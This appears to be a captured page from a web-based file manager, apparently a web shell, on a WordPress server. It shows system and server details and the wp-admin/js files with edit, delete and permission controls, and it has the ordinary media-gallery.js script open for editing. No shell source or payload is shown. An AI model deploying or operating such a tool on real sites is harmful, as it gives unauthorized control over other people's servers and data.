[ SYSTEM ]: Linux wordpress 6.1.0-41-amd64 #1 SMP PREEMPT_DYNAMIC Debian 6.1.158-1 (2025-11-09) x86_64
[ SERVER ]: Apache/2.4.66 (Debian) | PHP: 8.2.30
[ USER ]: www-data | IP: 172.19.30.54
GEFORCE FILE MANAGER
/
var
/
www
/
html
/
wordpress
/
wp-admin
/
js
/
UPLOAD:
NAME
SIZE
QUICK PERMS
ACTIONS
📁 widgets
SET
[ DEL ]
📄 accordion.js
2,933 B
SET
[ EDIT ]
|
[ DEL ]
📄 code-editor.js
11,588 B
SET
[ EDIT ]
|
[ DEL ]
📄 color-picker.js
9,768 B
SET
[ EDIT ]
|
[ DEL ]
📄 customize-nav-menus.min.js
48,272 B
SET
[ EDIT ]
|
[ DEL ]
📄 editor-expand.min.js
13,451 B
SET
[ EDIT ]
|
[ DEL ]
📄 language-chooser.min.js
423 B
SET
[ EDIT ]
|
[ DEL ]
📄 media-gallery.js
1,303 B
SET
[ EDIT ]
|
[ DEL ]
📄 media-upload.min.js
1,152 B
SET
[ EDIT ]
|
[ DEL ]
📄 media.min.js
2,439 B
SET
[ EDIT ]
|
[ DEL ]
📄 password-strength-meter.js
4,236 B
SET
[ EDIT ]
|
[ DEL ]
📄 privacy-tools.min.js
5,154 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-health.min.js
6,282 B
SET
[ EDIT ]
|
[ DEL ]
📄 site-icon.js
6,243 B
SET
[ EDIT ]
|
[ DEL ]
📄 svg-painter.js
3,280 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags-box.js
11,140 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags-box.min.js
3,077 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags-suggest.js
5,771 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags-suggest.min.js
2,269 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags.js
6,098 B
SET
[ EDIT ]
|
[ DEL ]
📄 tags.min.js
2,467 B
SET
[ EDIT ]
|
[ DEL ]
📄 user-suggest.min.js
676 B
SET
[ EDIT ]
|
[ DEL ]
📄 xfn.min.js
458 B
SET
[ EDIT ]
|
[ DEL ]
DELETE SELECTED
[ CLOSE ]
EDIT: media-gallery.js
/** * This file is used on media-upload.php which has been replaced by media-new.php and upload.php * * @deprecated 3.5.0 * @output wp-admin/js/media-gallery.js */ /* global ajaxurl */ jQuery(function($) { /** * Adds a click event handler to the element with a 'wp-gallery' class. */ $( 'body' ).on( 'click.wp-gallery', function(e) { var target = $( e.target ), id, img_size, nonceValue; if ( target.hasClass( 'wp-set-header' ) ) { // Opens the image to preview it full size. ( window.dialogArguments || opener || parent || top ).location.href = target.data( 'location' ); e.preventDefault(); } else if ( target.hasClass( 'wp-set-background' ) ) { // Sets the image as background of the theme. id = target.data( 'attachment-id' ); img_size = $( 'input[name="attachments[' + id + '][image-size]"]:checked').val(); nonceValue = $( '#_wpnonce' ).val() && ''; /** * This Ajax action has been deprecated since 3.5.0, see custom-background.php */ jQuery.post(ajaxurl, { action: 'set-background-image', attachment_id: id, _ajax_nonce: nonceValue, size: img_size }, function() { var win = window.dialogArguments || opener || parent || top; win.tb_remove(); win.location.reload(); }); e.preventDefault(); } }); });